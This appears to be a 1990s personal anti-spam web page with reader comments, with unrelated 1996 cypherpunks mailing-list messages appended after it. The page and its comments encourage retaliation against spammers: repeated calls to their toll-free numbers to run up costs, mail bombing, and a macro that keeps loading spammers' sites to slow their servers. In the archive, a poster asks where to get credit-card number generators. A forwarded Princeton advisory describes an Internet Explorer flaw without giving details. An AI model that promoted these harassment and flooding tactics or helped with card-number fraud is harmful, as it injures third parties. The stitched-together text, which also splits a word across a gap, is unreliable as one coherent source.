Title: Spam (Not the Hormel product)






<a href="http://www.metareality.com/~nathan/visit.cgi/html.Spam"
>[Fighting Spam]
 :

[Graffiti]
 :

[Home]
 :

[Limericks]
 :

[Linkage]





An honest
politician
is one who
takes your
bribe AND
votes as
you ask.




Spam (Not the Hormel product)

Anyone familiar with the usenet has seen it.  It's the vile stuff that
brain-dead get-rick-quick scheme promoters and professionsal advertisers
foist upon us all with increasing regularity.  There are (to date) two 
species of spam, differentiated by the mechanism by which they are 
delivered.  Each has its own defining charateristics, each has its own 
sub-species, but both have two things in common: they're made possible by 
the workings of the internet, and they're both examples of the same type 
of 'cost-shifting' that made junk faxes illegal.  Contrary to postal junk 
mail, where the sender bears the full cost of delivery, the spammer bears 
only a fraction of the cost of delivery; the remainder of the costs are 
borne by us, the recipients.  It's a waste of your bandwidth, your disk 
space, and your time.


email spam
Messages delivered by electronic mail to large numbers of recipients 
who did not ask for or otherwise solicit the messages.  It's the 
junk mail of the 21st century, only worse.

usenet spam
Messages delivered by usenet to large numbers of newsgroups whose 
chartered topics are unrelated to (and may even explicitly forbid) the 
topic of the message.



Not enough people seem to
realize that there are constructive ways to deal with it, and to reduce
the chance that you'll have to deal with it again in the future. 



  What to do

  What NOT to do



  The most effective is to write some 
  polite email to the administrator of the site from which the spam 
  originated.

  You'll soon learn that most system administrators are very unhappy 
  about users who spam the net.  It's 
  always gratifying when they write back to tell you that the offending 
  account has been terminated.

  Start reading <a 
  href="usenet://news.admin.net-abuse.misc">news.admin.net-abuse.misc 
  to learn more about how to deal with spammers.

  If there's a 1-800 number, call it to express your displeasure.  
  It might please you to note that 1-800 numbers typically cost them a 
  small amount of money with each call.  How much do you pay for your disk 
  space and bandwidth with each unsolicited bit of email?  It's only fair, 
  right?

  Grab your telephone, or even pay them a visit in person.  You 
  generally have to have access to a unix command line to find the phone 
  numbers and addresses, unless you're dealing with the same <a 
  href="http://www.metareality.com/~nathan/visit.cgi/spam/html.Offenders">spammers that have been 
  bothering me.  Why stick to email?  If they're in your area, tell 
  them face-to-face that you object to their tactics.



  Don't post a follow-up message in the same newsgroup.  Do you 
  really think that the spammer is going to re-visit thousands of 
  newsgroups to see what people had to say?

  The same goes for mailing lists.  If you get spammed via a mailing 
  list, never reply to the list.  Your words will just get 
  re-broadcast to everyone else on the list, thus doubling the nuisance 
  created by the spammer.





Fun stuff that doesn't get results, but might be good for a laugh


RecyclingIf they enjoy sending spam, then it only makes sense that
they wouldn't mind getting their own, right?  Just for kicks, forward each
new spam to the spammers who have pestered you in the past.  While I can't
vouch for its effectiveness, it does reek of
poetic justice, and it makes me feel a little better. 
It usually makes people laugh out loud when I explain it, too. <img src =
"http://www.metareality.com/~nathan/images/SMILE.GIF">

A Pre-emptive Anti-Spam TacticWhy wait to get spammed, when you
can see them coming in <a
href="news:news.admin.net-abuse.misc">news.admin.net-abuse.misc?  <a
href="http://www.metareality.com/~nathan/visit.cgi/spam/html.p.Pre-empt">Let the spammers know in advance that they
will be charged (insert dollar amount here) if they send you any junk
mail.  



Additional references


Spam and Anonymous Remailing Services

Damien Lucifer (<a 
href="mailto:ncognito@gate.net">ncognito@gate.net) operates an
anonymous remailing service.  He's put together a page covering spam and
remailers, including how to get a remailer to stop spamming you, and 
it is my pleasure to host this page for him. 

mail bombing
For advanced spam-fighters only.  Can concerted emailbombing be 
employed as a legitimate spam-fighting tactic?  Pros, cons, and related 
issues.

About Junk 
Email
Some of the hows and whys of junk email, and tactics you can use to 
help rid yourself of it.

A press release from MCI
...with information about their 
anti-spam policies.  See also their <a 
href="http://www.mci.com/aboutmci/news/nfr/spam.shtml">online policy 
statement.  Note that MCI's seriousness about these statements has 
been severely questioned in light of their (mis)handling of the 
Moneyworld/CHAG spammer.  30 days between announcing that the situation 
is being dealt with and finally cutting off a spammer with 
message-per-week spamming speed?  This is pretty disgusting in light of 
the good press MCI got when they announced their spam policies.  It's 
starting to look more like a PR stunt than a policy statement.  I 
can only take comfort knowing that at least their sysadmins are aware of 
(and frustrated with) the situation.

I must disclaim that civil legal issues may be involved in the
MCI/Moneyworld dispute, so there may be things going on that the public
isn't aware of.  Still, for MCI not to have covered its corporate ass does
not speak well of MCI's sincerity or the competence of MCI's lawyers.  

Outlaw 
Junk EMail Now!
Write your legislators, ask them to expand the 

TCPA to include junk email!  Note that as the law is currently 
written, it is 

unlikely to be applicable to email.

Fighting Junk 
Email"
More information about junk email and related issues.  Includes 
pointers to mechanical tactics for dealing with junk email.

Spam FAQ
Everything you never wanted to know about net spamming.

Get that 
spammer!Webified TCP/IP tools to aid in the fight against spam.

<a 
href="http://techweb.cmp.com/net/issues/036issue/036law.htm">Litigation 
to the rescue?
Use of the Telephone Consumer Protection Act of 1991 (47 U.S.C. sec 227) 
to nail junk emails.  The case described was settled out of court, but 
the ideas is intriguing.  This commentary, written by a lawyer, does not 
seem optistic about applying the TCPA directly to junk email, but 
doesn't rule out the possibility, either.

Litigation to the 
rescue!
$500 fines for junk mail via the courts.  Sounds like promising 
tactic for dealing with intra-USA spammings.  <a 
href="http://www.metareality.com/~nathan/visit.cgi/spam/html.FaxLaw">Some commentary on this law was posted to 
usenet a while back.

<a 
href="http://www.usps.gov/websites/depart/inspect/chainlet.htm">The U.S. 
Postal Service on Chain Letters
Contrary to what the make.money.fast crowd would have you believe, 
these scams are illegal.  See the aforelinked page for details, 
and and consider talking to the appropriate <a 
href="http://www.usps.gov/ncsc/locators/find-is.html">postal 
inspector as well.

<a 
href="http://www.bbb.org/council/complaints/consumerform.html">The Better 
Business Bureau
These folks will be happy to be notified of 'improper selling 
practices' via the aforelinked form.

Anti-Spam lists
This is a relatively new phenomenon.  People are starting to offer 
the 'service' of collecting lists of addresses of folks who do not want 
to get spam.  

I think this is a bad idea, since it attempts to legitimize 
junk email, by implying that if an email address is not on the list, it's 
prefectly OK to send junk email.  The other problem with this idea is 
that there are going to be several of them, and no junkmailer is going to 
filter their list using each "service."  Thus, it will be up to the 
recipients to track down all of the "services."

Currently there are at least three running.  One is at 
http://dm1.com/Epreference/epref.html, one is at 
http://www.kenjen.com/nospam,
and I don't have an URL for the last - it was sent to me via unsolicited 
email, naturally.

Terms of Service and Acceptable usage policies
Most Internet service providers require that their customers agree to 
a set of terms of service (TOS) or an acceptable usage policy (AUP).  A 
random sampling: <a 
href="http://www.mindspring.com/aboutms/policy.html">Mindspring's 
policy, Primenet's 
AUP, MCI's
spamming policy, and the terms and conditions for my own ISP, <a 
href="http://webfaq.halcyon.com/faq/nwn/nwntac.txt">Northwest Nexus 
(a.k.a. halcyon.com).

I should note that while Northwest Nexus doesn't describe spamming in 
their terms of service, they have booted more than one spammer in the 
past.  It surprises me greatly that they aren't explicit about this in 
their published terms and conditions.

A spamhandling robot
This is very "under construction," but worth mentioning anyhow.  I'm 
putting together some perl code to automate 
the spam-handling process.  




Common flavors of net.spam


 The MAKE.MONEY.FAST scheme 

A direct descendant of the chain letters of old, this is the pyramid scam 
of the information age...  A quick look at the mathematics behind the 
idea will expose the scam.


 Phone-sex cretins 


They post a couple of lines of text-mode heavy breathing, and usually a 
1-800 number that you're invited to call.  Call the 1-800 number.  
Really.  It costs them money every time you do!  They make their money 
via the 1-900 number that they ask you to call next.  So just call the 
1-800 number again.  And again.  And again.








<a href="http://www.metareality.com/~nathan/visit.cgi/html.Spam"
>[Fighting Spam]
 :

[Graffiti]
 :

[Home]
 :

[Limericks]
 :

[Linkage]





Don't just browse here, say something!
Speak your mind in this space here:

<input type=submit 
	value="Press here to have your words added to the page.">



 The true beauty of Usenet is the way it allows free communication.
You can be rich/poor/ugly/
 religious/atheist or a member of any
race/religion or be young/old... That's the wonder - everyone can talk to
one another and share ideas.
 Then spam comes along. It fills up
newsgroups with so much noise that no one reads it any more. That

wondrous method of communication has been lost. That's why I hate spam. 



 You just don't get it, do you?

 No, deleting one piece of email doesn't take much.  Then again,
neither does appealing to a system administrator to have the
spammer shut down.  Two or three bits of junk a day really is something 
I can live with, but I don't want to.  So why should I?  

Two or three bits of trash by the roadside won't mean the end of
the world.  Tossing empty cans out the window costs less than having your
trash hauled away - what a great opportunity to save money!  If litter
were acceptable, a public beach would be no place to spend an afternoon. 

 Postal mail costs the sender with each mailing.  This keeps junk
postal mail to tolerable levels. EMail costs the sender maybe
$20/month, period.  Are you so fucking stupid that you don't
realize what a cesspool the net would be if this were allowed to grow
unchecked? 

-NW


 People complain about spam and mass E-mailers.  But my question is:

what's the big deal?  Does it REALLY take THAT much PRECIOUS time out

of your day to click and delete a piece of E-mail? I think that the

people complaining about others taking advantage of an excellent

business opportunity ought to just relax a bit.  And just HOW does it 

COST you to deal with SPAM?  With ISP's dropping access prices and

providing unlimited access to the internet, how could it possibly

COST someone to get an E-mail message?  I think you people really need

to just kick back and relax already.  Geeze, if it wasn't SPAM what

else would you find to complain about?




 Spam isn't about content, spam is about quantity and cost shifting.  

TV spam would be the same ad on every channel at the same time.

Print spam would be junk mail sent postage due or charge-on-delivery.

With the ads on TV and in newspapers, the advertisers pay the expenses 
associated with publishing their ads.  With net spam, the recipients pay the 
expenses associated with carrying the ads.  That is the key difference.  

The costs of ads in traditional media help to support the very media that
deliver the ads.  With net.spam, there are no costs, and the ads just
serve to sap the medium.  All you need is a free trial account (AOL,
interramp, or earthlink, etc are famous for this), and you can broadcast a
huge amount of spam before anyone notices.  Or, you can pay for an account
with MCI, and broadcast huge amounts of spam for 30 days after the
sysadmins realize what's going on. 

-NW 


 Net-based spam is not the only form of spam. There is spam in print

and spam in TV advertising. Wouldn't you say every Calvin Klein ad

on TV, magazines or billboards is spam? How about Budweiser,

Lite beer, and McDonalds commercials.



If you see any type of advertising that offends your senses, you

should feel free to boycott the products, ask your friends to

boycott the products, etc. If the company has an 800 number or

web site, let them know that you find their advertising offensive.




 I am really, really, REALLY tired of being solicited to buy things 

whenever I log on to my computer. I mean, I pay for the phone line, 

the software, the hardware, the accounts and my time is worth money 

as well. I get a LOT of e-mail and a SIZEABLE portion of it is junk 

e-mail. When I read news, about 10% of it is junk e-mail; more if it

is a small newsgroup. I want to know what uninformed idiot is selling

my address, or where these people are GETTING it. I have never bought

anything over the computer. I have bounced unsolicited junk back to

the people who send it. (I love how righteously indignant these people

are: they send you mail and expect you to buy something from them and

when you fail to perform as expected with joy and gratitude...if you 

should, in fact, protest them wasting your time and resources...they

get downright rude and abusive. The presumptuousness of it just really

annoys me.) The capper is that I did some artwork for the anti-Canter-

and-Siegel "Green Card Lawyers" tees Joel Furr was offering a while ago.

The ultimate clue that I am not interested in spam of any sort, but how

could they know? It's just amusing. Let it be known that I am not a

test market, nor will I buy any of your crap, be it face cream, thigh

cream, green cards, stock options, modems, books, herbs, or the golden

goose itself. Not interested. I don't know you, I have no reason to trust

you, and you are spamming MY mailbox and expecting ME to reward this with

money. No, thank you. I've been online for more than 5 years, and I 

really long for the "good old days" before the Net was "cool".



There ya go. My tuppence. Now...where do I go to put my name on the

"Don't Send This Person Crap Mail" list? (Laugh)






 SPAM is only going to go away if we make sure companies learn that SPAMming doesn't get costumers to buy thier products and it does more to stop potential costumers from buying thier products.


 I've heard a couple of different conflicting stories about the origins of the use of the word spam in this context.  




The most popular version suggests that is was inspired by the
Monty Python skit in which virtually every item on some restaurant's menu
includes spam in some form or other.  The waiter's recitation of the menu
becomes unintelligible except for '...and spam, spam with..., spam salad,
...with spam, spam mixed with..." and so on.  It really picks up when the
Vikings start chanting "spam-spam spam, spam, spam-spam spam, spam...." ad
nauseum.  This is what the net would be like if this stuff was allowed to 
continue unchecked.  If that's not a horrifying thought, maybe you should 
see the skit in question.

My personal belief is that geeks (who make up much of the 'net
community (myself included), much of Monty Python's audience, and probably
most of Monty Python's cast) just tend to use the word spam when more
appropriate words don't come to mind readily.  For no particularly good
reason, it really stuck this time.


-NW


 Due to popular demand, I've expanded the first couple of paragraphs to 
better explain what spam is and why it's such a pain in the ass.  

Personally, I'm getting two to five unsolicited email messages every week.  This is up from approximately zero unsolicited messages per week a few years ago when I first started using the Internet and Usenet.  It's a trend that has been steadily increa





sing, especially for the last year or two.  It's a trend that really really worries me.  It's a trend that is, worst of all, wasting my time!

-NW


 I an working on a Usenet news server designed to filter spam from

a news feed and quietly drop it.  Announcements in due course (next

few months) but if anyone wants to help with other platforms and

live feed debugging please 
mail me.


 Wow! Thanks for the help. I'll certainly become an anti-spam activist

and use your information to good effect.


 I don't get it! What is SPAM?


 Pardon my ignorance but what does "SPAM"ming mean?

"SICK PEOPLE AGAINST MAIL"???


 For the Spammers that have a web page I visit it with a macro every time that

I leave my system idle while connected for more then 5 min. This way at least

I'm sucking down their site and causing their site to slow down so those that 

are interest get bored waiting for an over taxed server to show them just what

They get for "ONLY $9.99 A MONTH!!!!" and leave with out buying. 

The only reason they have the site is to make money. No Money, No Site, No Spam.




 Very nice -- I like the idea of dialing the 800 number in the ad.  One

might wish to be sure to mention (if there's a message taker or, even

better, a human at the other end) that you saw their ad in (insert

newsgroup here) -- and no, you're not interested in buying anything,

you just wanted to see what they had.



Unfortunately, every time you call the 800 number, chances are you're

also adding your own phone number to a database that will result in

your receiving "junk phone calls" on a variety of useless subjects.



Solution?  Make the calls from a pay phone, ideally one that doesn't

accept incoming calls.




 Isn't spam remarkably like the countless hours of television (including but not limited to advertisements) that most of us watched in our childhoods?  And to think, whoever controls the information going to the youth of the nation controls the future






 of the nation.  Greedy, stupid corporations played a central role in molding us and shaping our opinions, attitudes, and perspectives.  Something to think about, perhaps... 








<a href="http://www.metareality.com/~nathan/visit.cgi/html.Spam"
>[Fighting Spam]
 :

[Graffiti]
 :

[Home]
 :

[Limericks]
 :

[Linkage]



n a t e s c a p e </a
>@<a
href="http://www.metareality.com/"> m e t a r e a l i t y . c o m



This page last updated Aug 21
Comments last updated Aug 22


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Sutherland <maverick@thepentagon.com>
Date: Sun, 25 Aug 1996 09:59:01 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <19960825000344312.AAA199@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Aug 24 19:00:18 1996
> Does anybody know what I can get for generating the credit card
>  numbers?
> 

And they say there's hope for the youth of America.
- ---
Sean Sutherland       | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K w o 
PGP Key ID: E43E6489  | O-(++) M-- V PS+ PE++ Y PGP++ t--- 5+++ X++ R b++ 
Vote Harry Browne '96 | DI+ D+ G e- h! !r y
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key: finger or email w/ 'send key' in subj.  http://www2.interconnect.net/maverick

iQEVAwUBMh+Xk1ZoKRrkPmSJAQGj+Af8C2P7D+3ZZ4f8h76+6UfdgqEubOO0mkWj
2DazxBMuY1b1sx1G6gaIGR9Tc11vIcoCY3pmBzhBW7Nc6do8gfOK8Bkkon6Pck1g
61tCFH6qPb2bSH0HnbzjrXJhRD6dFv9ondTtyZgiFIeMuVDDIx4+ZKvelL6BHk8x
o6sLdY4Y/Nmnvz9HXrBj0DaYR8pcY96+dexwj5luvcgVkdsDjghWXZy/mHkeDXMI
bvOuUOMLQyExS0Ts4D5K4/XfIhP0HUiPfdeL9oxONcLUYznywxAUevBMfHceqvsS
qFnxcDcyHa8ynHLRH9Qg0t5QuKVUvTpZh3YjPXCF9QKwvIFbZukHKw==
=e03n
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Howell" <451degree@msn.com>
Date: Sun, 25 Aug 1996 06:23:33 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <UPMAIL01.199608241923190150@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody know where I can get good scanning program. Thanks a lot, 451 
degree :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Howell" <451degree@msn.com>
Date: Sun, 25 Aug 1996 06:20:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <UPMAIL01.199608241925150568@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody know what I can get for generating the credit card numbers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Howell" <451degree@msn.com>
Date: Sun, 25 Aug 1996 05:59:37 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <UPMAIL01.199608241926350212@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how to connect to the internet thru MSN mail?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 25 Aug 1996 11:12:58 +0800
To: Mike Howell <451degree@msn.com>
Subject: Re: your mail
In-Reply-To: <UPMAIL01.199608241926350212@msn.com>
Message-ID: <Pine.LNX.3.93.960824193143.144B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 24 Aug 1996, Mike Howell wrote:

> Does anyone know how to connect to the internet thru MSN mail?

      There is no way. You have to purchase the MicroSoft Internet Upgrade,
and have the internet installed on your compter. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sun, 25 Aug 1996 10:20:01 +0800
To: CP <cypherpunks@toad.com>
Subject: [NOISE]Mangled messages
Message-ID: <9608242156.aa19985@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


	I did a quick count and found 35 messages that have been
mangled today. Fortunately, the last message I got wasn't
mangled. Hopefully this is the end of the problem.

	Derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Howell" <451degree@msn.com>
Date: Sun, 25 Aug 1996 08:17:37 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <UPMAIL01.199608242213390536@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


How can I sign off the MSN forewer? Please tell me how can I quit this MSN 
thing for ever, I don`t want to pay for this anymore...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Howell" <451degree@msn.com>
Date: Sun, 25 Aug 1996 09:43:23 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <UPMAIL01.199608242225250181@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


How can I sign off the MSN forewer? Please tell me how can I quit this MSN 
thing for ever, I don`t want to pay for this anymore...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 25 Aug 1996 13:43:28 +0800
To: cypherpunks@toad.com
Subject: Message Body Suppressed...
Message-ID: <199608250312.WAA05286@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Aug 24 22:16:12 1996
>    ----- Message body suppressed -----
> 
> --TAA17492.840768149/tera.mcom.com--
> 
> 
> 
> 

This is getting annoying.  Could one of our
resident Netscape employees take a look into
this one and see what's happening?

dave


- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"The only reason you're still alive is because someone has
 decided to let you live." - Nicole Blackman/KMFDM, "Apathy"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMh/FfzVTwUKWHSsJAQFLSwf/QVlIDuTj8Q3hC+hqyl0mLPbYkO82+1f5
FoVukNpdsc/2OQ0+jAD3MjcHJO/yEIVW45+4P6wAutWdsvU5t61gCz3HUblCLC2t
tO84wNBNGVRI6d3HpEE7aKRAUAfmqOcv6YcUx5eXfjRJrXdXE0k5EzuUzyQgIBbI
B4a4P6WHloq5WtCIlmbt/J3voMIE4b/y/8kbDl1l9RziwRGX6SkYRK3i9v9YTcgl
eWHT8uMoI6/GDjxzuEvn1ZUcvkIofh7mLXvP+H5DrSzNpv3knkfKBa5ce9TOkX3o
RFa2bHgWXWMtkiTVD2HLpEZ0SaxWahxABavllg1lzzuiE/+Sli/BKA==
=TV20
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 28 Aug 1996 23:36:54 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Spamming (fwd)
Message-ID: <199608260000.AAA00199@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From daemon Sun Aug 25 06:35:39 1996
Message-Id: <199605140403.EAA00545@fountainhead.net>
Subject: Re: Spamming
To: jad@dsddhc.com (John Deters)
Date: Tue, 14 May 1996 04:03:55 +0000 (GMT)
Cc: cypherpunks@toad.com
In-Reply-To: <2.2.32.19960822220224.006a0ff0@labg30> from "John Deters" at Aug 22, 96 05:02:24 pm
From: Vipul Ved Prakash <vipul@pobox.com>
Reply-To: vipul@pobox.com
X-Organization: Positive Ideas 
Content-Type: text
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-Status: 

> 
> At 02:55 PM 8/22/96 +0000, Vipul Ved Prakash wrote:
> >> 
> >> At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
> [deleted]
> >>   1. Junkmail requires the SENDER to pay for it, not the recipient.
> >    Internet pricing models are complicated and debatable, but you surely
> >    end up paying for snail-junk-mail. Not directly, but hidden in the high
> >    first-class mail costs. More mail, more infrastructure, higher costs.
> >    This could be quite true for the net also, if we consider bandwidth costs
> >    money.
> 
> I beg to differ.  The USPS considers "junk" mail their bread-and-butter.
> Huge mailings of all manner of bulk mail (especially those that are PostNet
> barcoded by the sender) pay the bills around the Post Office.  Your "more
> mail, more infrastructure, higher costs" argument is flawed.  The post
> office has many fixed costs related to maintaining their huge presence,
> delivering to so many rural addresses.  If we had to pay a per-letter basis
> *discounting* the value provided by the infrastructure already in place
> supporting the bulk-mail handling systems, we'd be paying roughly Federal
> Express 2-day letter rates for each piece of mail (around $6.00, if memory
> serves correctly.)

Alright, I agree. Though this could very easily differ with size and reach 
of a PS.  But on the net it means more bandwidth right? 
Which means more bandwidth, and more money. Hang on. This might not be 
a problem in US (as jim bell points out there is tons of untapped bandwith), 
but it is in other not so well connected countries. 
For example, if somebody spams an Indian Network from india, the
spam goes to US and comes back to india (since our govt sayz you cant connect
2 local networks!) and eats up most of the 20 MBps bandwidth.
Gov't will buy more bandwidth and will make us pay for it!

- Vipul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 27 Aug 1996 08:58:42 +0800
To: cypherpunks@toad.com
Subject: Microsoft Explorer security hole (fwd)
Message-ID: <Pine.A32.3.93.960826001930.31882A-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 26 Aug 1996 01:35:07 GMT
Subject: Microsoft Explorer security hole (fwd)

On Sun, 25 Aug 1996 13:55:30 -0600 (MDT), Carl Nation
<carl@iserver.com> wrote:

To our Resellers/Customers,

Our sysadmin received this security alert, and we thought we should
pass it along...

------- Forwarded Message

Date: Wed, 21 Aug 1996 13:12:59 -0400
From: felten@CS.Princeton.EDU (Ed Felten)
Subject: Internet Explorer Security Problem

We have discovered a security flaw in the current version (3.0) of
Microsoft's Internet Explorer browser running under Windows 95.  An
attacker could exploit the flaw to run any DOS command on the machine of
an Explorer user who visits the attacker's page.  For example, the
attacker could read, modify, or delete the victim's files, or insert a
virus or backdoor entrance into the victim's machine.  We have verified
our discovery by creating a Web page that deletes a file on the machine of
any Explorer user who visits the page.

The core of the attack is a technique for delivering a document to the
victim's browser while bypassing the security checks that would
normally be applied to the document.  If the document is, for example, a
Microsoft Word template, it could contain a macro that executes any DOS
command.

Normally, before Explorer downloads a dangerous file like a Word
document, it displays a dialog box warning that the file might contain a
virus or other dangerous content, and asking the user whether to abort the
download or to proceed with the download anyway.  This gives the user a
chance to avoid the risk of a malicious document.  However, our technique
allows an attacker to deliver a document without triggering the dialog
box.

Microsoft has been notified and they are working on fixing the
problem. Until a remedy is widely available, we will not disclose further
details about the flaw.

For more information, contact Ed Felten at felten@cs.princeton.edu or
609-258-5906.

Dirk Balfanz and Ed Felten
Dept. of Computer Science, Princeton University
http://www.cs.princeton.edu/sip/

------- End of Forwarded Message








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 26 Aug 1996 20:15:05 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: [US POLITICS] Cypherpunk voting - ITAR or CDA
Message-ID: <199608260837.BAA29555@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:37 AM 8/25/96 -0400, Vincent Cate <vince@offshore.com.ai> wrote:
>Dole says he would fix the ITAR problem, but try to keep something like
>CDA. 
>Clinton is keeping ITAR and signed CDA.  But not having the religious
>right he might soften on CDA.

Clinton is, of course, not a liberal.  Censorship doesn't bother him much.
(He's a friendly statist who likes to control your money more than
your life, so he might occasionally feel a twinge of guilt,
but not enough to change policies, and only if the polls are suggesting
that guilt would be a useful PR move.)

Dole, on the other hand, stands for being in his party longer than
anyone else, doing a competent job of insider coordination, and 
keeping Big Agribusiness happy.  His speechwriters are mildly
opposed to free trade, but like US exports.  Crypto software is not
a product of Archer Daniels Midland, Supermarket to the World,
but if the polls suggest that it's as popular as corn oil,
he'll have his speechwriters write a speech in favor of it.

Ross Perot's gonna get together a team of experts to decide on it,
though if we allow those Canadians to get American Encryption Technology
before we throw out NAFTA, there's gonna be a giant sucking sound
as all our cryptography business gets hoovered up to the Frozen North.

Ralph Nader knows that Clipper is unsafe at any speed, and would certainly
allow open public inquiry into the military-industrial complex's
encryption policy-making process, though any technological exports
would require an environmental impact statement, 2% of sales would be
required to be on solar-powered low-emission computing equipment,
and foreign cryptographic developers would have to be paid a living wage.

Dr. John Hagelin (no, not _that_ Hagelin) knows that mathematics
operates in harmony with Natural Law, and his party will introduce
scientifically proven techniques for reducing the entropy level of
messages, and eliminating the stress and paranoia that lead people to
hide the content of their messages.  Further more, special teams of
Sidhi(tm)-trained technicians will provide telepathic transmission for
areas with high levels of stress, which has been shown to reduce conflict
when only 1% of the telephone callers are accessed using these Scientifically
Proven Techniques.  Bring an offering of fruit and flowers to the polls.

The Socialist Worker's Party statement will be available as soon as
the Teamsters election results allow appointment of a bargaining unit
for the Bit Twiddlers, Left Shifters, and Table Look-up locals to
negotiate protocols with network management, and categorically
refuses the counter-revolutionary demands for EXclusive Or which the
multi-national corporations intend to impose on the work force.

.....

As you might have guessed, I'm still planning to vote Libertarian :-)
Free minds, free markets, free speech, and I guess Harry Browne
will do as good a job as any candidate we've had in a while.
Vice-presidential candidate Jo Jorgenson has run her own software
business for a while.

......

However, if you're tired of the Lesser of N evils, Cthulu's
export policy is that you can't escape anyway, and your puny mortal 
lives will be absorbed along with his morning coffee.
Your encryption technology is futile against the Elder Ghods,
and the arcane formulas in the Cyphernomicon of that mad physicist
Tim The Enchanter may summon spirits from the vasty deep, but
no secrets are safe from Nyarla-S-Ahothep who knows all and sees all.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 27 Aug 1996 11:02:08 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <199608262107.OAA16648@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:50 AM 8/26/96 -0700, Declan McCullagh wrote:
> Go a head and reject the "Beltway politicians". It's fashionable, sure, but
> what does it really accomplish?  Some of them are dangerous. Others are
> sympathetic. 

Not true, some of them are merely less dangerous and harmful than others.

As to whether Leahy is one of the less dangerous and harmful ones, that
is seriously questionable.

> The fact is that short of armed rebellion they are going to be
> here for a while.I shudder to think of the wrath our opponents 
> could wage if we all threw up our hands packed up our bags and left town.

Bad cop, good cop.  You cooperate with the "good" cop, you go to jail.  You
tell them both to go to hell, then maybe you will not go to jail, and if you
do go to jail, at least you will have the satisfaction of screaming injustice
all the way:

Re read what our "good" cop has been up to:

> > Worse yet, as recently as this month Leahy has
> > been clamoring to fund the invasive wiretapping legislation ("Digital
> > Telephony") he shepherded through Congress two years ago.
> >
> > Equally distressingly, Leahy demonstrated his "impeccable cyberspace
> > credentials" by cosponsoring the Senate online copyright bill -- aka the
> > Hollywood Media Mafia's wet dream. (Yes, these are the same rapacious
> > folks who are demanding that the Boy Scouts and summer camps pay cash to
> > sing "God Bless America" and "Puff the Magic Dragon.") Opposed by the
> > American Library Association, EFF, and teachers' organizations, Leahy's
> > bill would slam fair use rights online and could make it a crime to
> > browse the Net without a license.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@ecotone.toad.com>
Date: Mon, 26 Aug 1996 19:07:46 +0800
To: cypherpunks@toad.com
Subject: ADMIN: The list was off for a day
Message-ID: <199608260857.BAA22202@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  The cypherpunks@toad.com list was turned off for just over a day to
